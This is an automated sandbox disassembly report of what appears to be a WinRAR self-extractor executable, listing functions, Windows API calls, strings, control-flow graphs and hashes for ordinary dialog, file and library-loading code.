    • Opcode ID: b6bed20682c164b1411bbe9510bbf15a790d0ae858cb0c71774eaf90d0b5c1fb
    • Instruction ID: 13c8aec82a6ffa3c50262f6ab9bcdf11b9ef730bca3610cad084de4b8748afc9
    • Opcode Fuzzy Hash: b6bed20682c164b1411bbe9510bbf15a790d0ae858cb0c71774eaf90d0b5c1fb
    • Instruction Fuzzy Hash: 55A208B0A04245AEDF65DF64C895BEF7BF4BF05300F0841B9E9499B183D7349A48CBA9
    Function 000691A0 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetCurrentProcess.KERNEL32(00000000,?,00069176,00000000,0007D570,0000000C,000692CD,00000000,00000002,00000000), ref: 000691C1
    • TerminateProcess.KERNEL32(00000000,?,00069176,00000000,0007D570,0000000C,000692CD,00000000,00000002,00000000), ref: 000691C8
    • ExitProcess.KERNEL32 ref: 000691DA
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Process$CurrentExitTerminate
    • String ID:
    • API String ID: 1703294689-0
    • Opcode ID: dc6774495eab2cb99e0ba52e3e3465a3abb94c453895d99767374c456d69ffb1
    • Instruction ID: 32e9b16080ed20c9438df56f5e01c366bdaae32e3ceac0b9a6b86b04e52bc850
    • Opcode Fuzzy Hash: dc6774495eab2cb99e0ba52e3e3465a3abb94c453895d99767374c456d69ffb1
    • Instruction Fuzzy Hash: 60E0B636404549EBDF116F64DD09AA83B6BEB51341B114414F9099A532CB3DEE82CA90
    Function 0005B080 Relevance: 3.0, APIs: 2, Instructions: 25nativeCOMMON
    Download Yara Rule
    APIs
    • SetWindowLongW.USER32(?,000000EB), ref: 0005B098
    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0005B0B3
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Window$LongNtdllProc_
    • String ID:
    • API String ID: 2044268144-0
    • Opcode ID: c75823751a312d49313ed8fc0c8fe2f98cab726184dfd390407dc967408601db
    • Instruction ID: 4f63747c59988327ac67038682c4aecb3dfa3c3d69191a5abe543a8b6e08239e
    • Opcode Fuzzy Hash: c75823751a312d49313ed8fc0c8fe2f98cab726184dfd390407dc967408601db
    • Instruction Fuzzy Hash: 61E0E536200518BB8F119F99DD08C9F3F69FF8A771B008111F9195A161C771A962EBA0
    Function 00057DCC Relevance: .3, Instructions: 343COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: ed49a3125a1d4e48d86fa620310d82cdcc1156d70c5a8d493c8d8ca29e827784
    • Instruction ID: 533709a8505b80f37b79069c27b86895d1710abfea7f9476e08a822fddc312d5
    • Opcode Fuzzy Hash: ed49a3125a1d4e48d86fa620310d82cdcc1156d70c5a8d493c8d8ca29e827784
    • Instruction Fuzzy Hash: 43D194B16087448FDB24CF28D84479BBBE5BF89309F04456DEC89A7242D734ED49CB5A
    Function 0005C9C0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 734windowfilesleepCOMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 0005C9C5
      • Part of subcall function 000412F6: GetParent.USER32(?), ref: 0004132A
      • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
      • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005CAB1
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005CACF
    • IsDialogMessageW.USER32(?,?), ref: 0005CAE2
    • TranslateMessage.USER32(?), ref: 0005CAF0
    • DispatchMessageW.USER32(?), ref: 0005CAFA
    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0005CB1D
    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0005CB40
    • GetDlgItem.USER32(?,00000068), ref: 0005CB63
    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0005CB7E
    • SendMessageW.USER32(00000000,000000C2,00000000,000745F4), ref: 0005CB91
      • Part of subcall function 0005E586: _wcslen.LIBCMT ref: 0005E5B0
    • SetFocus.USER32(00000000), ref: 0005CB98
    • _swprintf.LIBCMT ref: 0005CBF7
      • Part of subcall function 00044A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A33
    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0005CC5A
    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0005CC82
    • GetTickCount.KERNEL32 ref: 0005CCA0
    • _swprintf.LIBCMT ref: 0005CCB8
    • GetLastError.KERNEL32(?,00000011), ref: 0005CCEA
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0005CD3D
    • _swprintf.LIBCMT ref: 0005CD74
    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp), ref: 0005CDC8
    • GetCommandLineW.KERNEL32 ref: 0005CDDE
    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00091482,00000400,00000001,00000001), ref: 0005CE35
    • Sleep.KERNEL32(00000064), ref: 0005CEA5
    • UnmapViewOfFile.KERNEL32(?,?,0000421C,00091482,00000400), ref: 0005CECE
    • CloseHandle.KERNEL32(00000000), ref: 0005CED7
    • _swprintf.LIBCMT ref: 0005CF0A
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005CF69
    • SetDlgItemTextW.USER32(?,00000065,000745F4), ref: 0005CF80
    • GetDlgItem.USER32(?,00000065), ref: 0005CF89
    • GetWindowLongW.USER32(00000000,000000F0), ref: 0005CF98
    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0005CFA7
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005D054
    • _wcslen.LIBCMT ref: 0005D0AA
    • _swprintf.LIBCMT ref: 0005D0D4
    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0005D11E
    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0005D138
    • GetDlgItem.USER32(?,00000068), ref: 0005D141
    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0005D157
    • GetDlgItem.USER32(?,00000066), ref: 0005D171
    • SetWindowTextW.USER32(00000000,0009389A), ref: 0005D193
    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0005D1F3
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005D206
    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001C7A0,00000000,?), ref: 0005D2A9
    • EnableWindow.USER32(00000000,00000000), ref: 0005D383
    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0005D3C5
      • Part of subcall function 0005D872: __EH_prolog.LIBCMT ref: 0005D877
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005D3E9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Item$MessageText$Send$Window_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableFocusHandleLineMappingModuleNameParamParentSleepTickTranslateUnmapUser__vswprintf_c_l
    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
    • API String ID: 3593385084-1645151803
    • Opcode ID: 77ffdbeaf69d6409941b6e20f1b5f8a76b75bea11f4c6acbe1273897b5da4bf9
    • Instruction ID: 088a1247d03f71a23e005082c80a4926cdbfac8528d8c5eaebb5ad337a51998d
    • Opcode Fuzzy Hash: 77ffdbeaf69d6409941b6e20f1b5f8a76b75bea11f4c6acbe1273897b5da4bf9
    • Instruction Fuzzy Hash: E642C671944744BEFB219B609C4AFFF37ACAB12702F044156FA45B60D2CBB84E49CB66
    Function 00051B7C Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 274 51b7c-51b9f call 5ffc0 GetModuleHandleW 277 51ba1-51bb8 GetProcAddress 274->277 278 51c00-51e61 274->278 281 51bd2-51be2 GetProcAddress 277->281 282 51bba-51bd0 277->282 279 51e67-51e72 call 689de 278->279 280 51f2d-51f59 GetModuleFileNameW call 4d6a7 call 51928 278->280 279->280 291 51e78-51ea6 GetModuleFileNameW CreateFileW 279->291 297 51f5b-51f67 call 4c619 280->297 285 51be4-51bf9 281->285 286 51bfe 281->286 282->281 285->286 286->278 294 51f21-51f28 CloseHandle 291->294 295 51ea8-51eb4 SetFilePointer 291->295 294->280 295->294 298 51eb6-51ed2 ReadFile 295->298 303 51f96-51fbd call 4d71d GetFileAttributesW 297->303 304 51f69-51f74 call 51b34 297->304 298->294 300 51ed4-51ef9 298->300 302 51f16-51f1f call 51697 300->302 302->294 309 51efb-51f15 call 51b34 302->309 312 51fc7 303->312 313 51fbf-51fc3 303->313 304->303 315 51f76-51f94 CompareStringW 304->315 309->302 317 51fc9-51fce 312->317 313->297 316 51fc5 313->316 315->303 315->313 316->317 319 52005-52007 317->319 320 51fd0 317->320 322 52114-5211e 319->322 323 5200d-52024 call 4d6f1 call 4c619 319->323 321 51fd2-51ff9 call 4d71d GetFileAttributesW 320->321 328 52003 321->328 329 51ffb-51fff 321->329 333 52026-52087 call 51b34 * 2 call 4f937 call 44a20 call 4f937 call 5b7e4 323->333 334 5208c-520bf call 44a20 AllocConsole 323->334 328->319 329->321 332 52001 329->332 332->319 340 5210c-5210e ExitProcess 333->340 339 520c1-52106 GetCurrentProcessId AttachConsole call 64f93 GetStdHandle WriteConsoleW Sleep FreeConsole 334->339 334->340 339->340
    APIs
    • GetModuleHandleW.KERNEL32(kernel32), ref: 00051B95
    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00051BA7
    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00051BD8
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00051E82
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00051E9C
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00051EAC
    • ReadFile.KERNEL32(00000000,?,00007FFE,00074D24,00000000), ref: 00051ECA
    • CloseHandle.KERNEL32(00000000), ref: 00051F22
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00051F37
    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00074D24,?,00000000,?,00000800), ref: 00051F8B
    • GetFileAttributesW.KERNEL32(?,?,00074D24,00000800,?,00000000,?,00000800), ref: 00051FB5
    • GetFileAttributesW.KERNEL32(?,?,00074DEC,00000800), ref: 00051FF1
      • Part of subcall function 00051B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00051B4F
      • Part of subcall function 00051B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00050633,Crypt32.dll,00000000,000506AD,00000200,?,00050690,00000000,00000000,?), ref: 00051B71
    • _swprintf.LIBCMT ref: 00052063
    • _swprintf.LIBCMT ref: 000520AF
      • Part of subcall function 00044A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A33
    • AllocConsole.KERNEL32 ref: 000520B7
    • GetCurrentProcessId.KERNEL32 ref: 000520C1
    • AttachConsole.KERNEL32(00000000), ref: 000520C8
    • _wcslen.LIBCMT ref: 000520DD
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 000520EE
    • WriteConsoleW.KERNEL32(00000000), ref: 000520F5
    • Sleep.KERNEL32(00002710), ref: 00052100
    • FreeConsole.KERNEL32 ref: 00052106
    • ExitProcess.KERNEL32 ref: 0005210E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
    • API String ID: 1207345701-3298887752
    • Opcode ID: 291cf80b832b15a185b813b5723b161b203ce4cb0a0be45db1ba215ac064d1b2
    • Instruction ID: 61e17c5882b27b018b81fccc56612aaea06b18ed49857b44e19bfebb190aa6ba
    • Opcode Fuzzy Hash: 291cf80b832b15a185b813b5723b161b203ce4cb0a0be45db1ba215ac064d1b2
    • Instruction Fuzzy Hash: 13D172B18083849BD7319F50DC48BDFB6E8FB85305F50892DF68D96151DBBC8548CBAA
    Function 0004ED87 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 0004ED90
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0004EDCC
      • Part of subcall function 0004D6A7: _wcslen.LIBCMT ref: 0004D6AF
      • Part of subcall function 00051900: _wcslen.LIBCMT ref: 00051906
      • Part of subcall function 00052EC2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0004CF18,00000000,?,?), ref: 00052EDE
    • _wcslen.LIBCMT ref: 0004F109
    • __fprintf_l.LIBCMT ref: 0004F23C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
    • API String ID: 566448164-801612888
    • Opcode ID: ae18fcaf31ec10a4fab74b37cbdea994292c8d1c2f43f468aaa1a4e628bc3ae7
    • Instruction ID: d6eafeccc78d2bbcd5cfe61a951344db699161891b1a843087eea62f36da04b4
    • Opcode Fuzzy Hash: ae18fcaf31ec10a4fab74b37cbdea994292c8d1c2f43f468aaa1a4e628bc3ae7
    • Instruction Fuzzy Hash: A932D0B1A0021AABDF24EF68C841AFE37A5FF44704F40457AFA0697192EB71DD85CB58
    Function 0005AEE5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 116COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 658 5aee5-5af13 ShowWindow call 5ac14 661 5af15-5af1d call 65209 658->661 662 5af1e-5af23 658->662 661->662 664 5af25-5af27 662->664 665 5af29-5af32 call 68a08 662->665 667 5af33-5af3b 664->667 665->667 670 5af41-5af4a call 68a08 667->670 671 5af3d-5af3f 667->671 672 5af4b-5af75 GetWindowRect GetParent MapWindowPoints 670->672 671->672 674 5af77-5af7a DestroyWindow 672->674 675 5af80-5afc9 GetParent CreateWindowExW 672->675 674->675 677 5b008-5b00a 675->677 678 5afcb-5afce 675->678 680 5b00c-5b018 ShowWindow UpdateWindow 677->680 681 5b01e-5b024 677->681 678->677 679 5afd0-5afd2 678->679 679->681 682 5afd4-5afd7 679->682 680->681 682->681 683 5afd9-5afdc 682->683 683->681 684 5afde-5afec call 5ad0e 683->684 684->681 687 5afee-5b006 ShowWindow SetWindowTextW call 65209 684->687 687->681
    APIs
    • ShowWindow.USER32(?,00000000), ref: 0005AEFE
      • Part of subcall function 0005AC14: LoadCursorW.USER32(00000000,00007F00), ref: 0005AC4B
      • Part of subcall function 0005AC14: RegisterClassExW.USER32(00000030), ref: 0005AC6C
    • GetWindowRect.USER32(?,?), ref: 0005AF54
    • GetParent.USER32(?), ref: 0005AF62
    • MapWindowPoints.USER32(00000000,00000000), ref: 0005AF6B
    • DestroyWindow.USER32(00000000), ref: 0005AF7A
    • GetParent.USER32(?), ref: 0005AF97
    • CreateWindowExW.USER32(00000000,RarHtmlClassName,00000000,40000000,?,?,?,?,00000000), ref: 0005AFBB
    • ShowWindow.USER32(?,00000005,00000000), ref: 0005AFF1
    • SetWindowTextW.USER32(?,00000000), ref: 0005AFF9
    • ShowWindow.USER32(00000000,00000005), ref: 0005B00F
    • UpdateWindow.USER32(00000000), ref: 0005B018
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Window$Show$Parent$ClassCreateCursorDestroyLoadPointsRectRegisterTextUpdate
    • String ID: RarHtmlClassName
    • API String ID: 3841971108-1658105358
    • Opcode ID: 80461f516e447e362a978f6d8cbbe8cc989b7edda1d1a0b53c29aae1e898e9bf
    • Instruction ID: ce929ce64c69341c8bf353011b82f2a61bc883a5ab139e5508812c234eb847c3
    • Opcode Fuzzy Hash: 80461f516e447e362a978f6d8cbbe8cc989b7edda1d1a0b53c29aae1e898e9bf
    • Instruction Fuzzy Hash: E241E271104604EFEB219F64DC49BAF7BE8FF49302F144669FD4999092DB74E808CB66
    Function 0005E607 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 690 5e607-5e633 call 5c748 GetDlgItem 693 5e635-5e662 call 5a235 ShowWindow SendMessageW * 2 690->693 694 5e669-5e6a3 SendMessageW * 2 690->694 693->694 696 5e6a5-5e6c0 694->696 697 5e6c4-5e6f5 SendMessageW * 3 694->697 696->697 699 5e6f7-5e714 SendMessageW 697->699 700 5e71a-5e730 SendMessageW 697->700 699->700
    APIs
      • Part of subcall function 0005C748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005C759
      • Part of subcall function 0005C748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0005C76A
      • Part of subcall function 0005C748: IsDialogMessageW.USER32(00010468,?), ref: 0005C77E
      • Part of subcall function 0005C748: TranslateMessage.USER32(?), ref: 0005C78C
      • Part of subcall function 0005C748: DispatchMessageW.USER32(?), ref: 0005C796
    • GetDlgItem.USER32(00000068,000A1CF0), ref: 0005E61B
    • ShowWindow.USER32(00000000,00000005,?,?,00000001,?,?,0005C999,000760F0,000A1CF0,000A1CF0,00001000,?,00000000,?), ref: 0005E643
    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0005E64E
    • SendMessageW.USER32(00000000,000000C2,00000000,000745F4), ref: 0005E65C
    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0005E672
    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0005E68C
    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0005E6D0
    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0005E6DE
    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0005E6ED
    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0005E714
    • SendMessageW.USER32(00000000,000000C2,00000000,0007549C), ref: 0005E723
      • Part of subcall function 0005A235: DestroyWindow.USER32(?,00000000,0005E640,?,?,00000001,?,?,0005C999,000760F0,000A1CF0,000A1CF0,00001000,?,00000000,?), ref: 0005A241
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Message$Send$Window$CallbackDestroyDialogDispatchDispatcherItemPeekShowTranslateUser
    • String ID: \
    • API String ID: 3039329835-2967466578
    • Opcode ID: c63c85fa3e9049dfeae01d5c5aa24c9ff0fb5f287e6cf60f981062d8235b0de8
    • Instruction ID: 75419e38c15c832771cfca5c8c55ef992939a59c6bbb806ecba887e4cf7d566a
    • Opcode Fuzzy Hash: c63c85fa3e9049dfeae01d5c5aa24c9ff0fb5f287e6cf60f981062d8235b0de8
    • Instruction Fuzzy Hash: 4231A171685F44ABF301DF20DC4AFBB3AACFB87706F000A0DF69196191C7695A088B66
    Function 0006BB0B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 725 6bb0b-6bb24 726 6bb26-6bb36 call 700fc 725->726 727 6bb3a-6bb3f 725->727 726->727 734 6bb38 726->734 729 6bb41-6bb49 727->729 730 6bb4c-6bb70 MultiByteToWideChar 727->730 729->730 732 6bb76-6bb82 730->732 733 6bd03-6bd16 call 60d6c 730->733 735 6bbd6 732->735 736 6bb84-6bb95 732->736 734->727 738 6bbd8-6bbda 735->738 739 6bb97-6bba6 call 731c0 736->739 740 6bbb4-6bbc5 call 6a7ee 736->740 743 6bbe0-6bbf3 MultiByteToWideChar 738->743 744 6bcf8 738->744 739->744 753 6bbac-6bbb2 739->753 740->744 750 6bbcb 740->750 743->744 747 6bbf9-6bc0b call 6c11c 743->747 748 6bcfa-6bd01 call 6bd73 744->748 755 6bc10-6bc14 747->755 748->733 754 6bbd1-6bbd4 750->754 753->754 754->738 755->744 757 6bc1a-6bc21 755->757 758 6bc23-6bc28 757->758 759 6bc5b-6bc67 757->759 758->748 762 6bc2e-6bc30 758->762 760 6bcb3 759->760 761 6bc69-6bc7a 759->761 765 6bcb5-6bcb7 760->765 763 6bc95-6bca6 call 6a7ee 761->763 764 6bc7c-6bc8b call 731c0 761->764 762->744 766 6bc36-6bc50 call 6c11c 762->766 769 6bcf1-6bcf7 call 6bd73 763->769 781 6bca8 763->781 764->769 779 6bc8d-6bc93 764->779 765->769 770 6bcb9-6bcd2 call 6c11c 765->770 766->748 778 6bc56 766->778 769->744 770->769 782 6bcd4-6bcdb 770->782 778->744 783 6bcae-6bcb1 779->783 781->783 784 6bd17-6bd1d 782->784 785 6bcdd-6bcde 782->785 783->765 786 6bcdf-6bcef WideCharToMultiByte 784->786 785->786 786->769 787 6bd1f-6bd26 call 6bd73 786->787 787->748
    APIs
    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00066993,00066993,?,?,?,0006BD5C,00000001,00000001,62E85006), ref: 0006BB65
    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0006BD5C,00000001,00000001,62E85006,?,?,?), ref: 0006BBEB
    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0006BCE5
    • __freea.LIBCMT ref: 0006BCF2
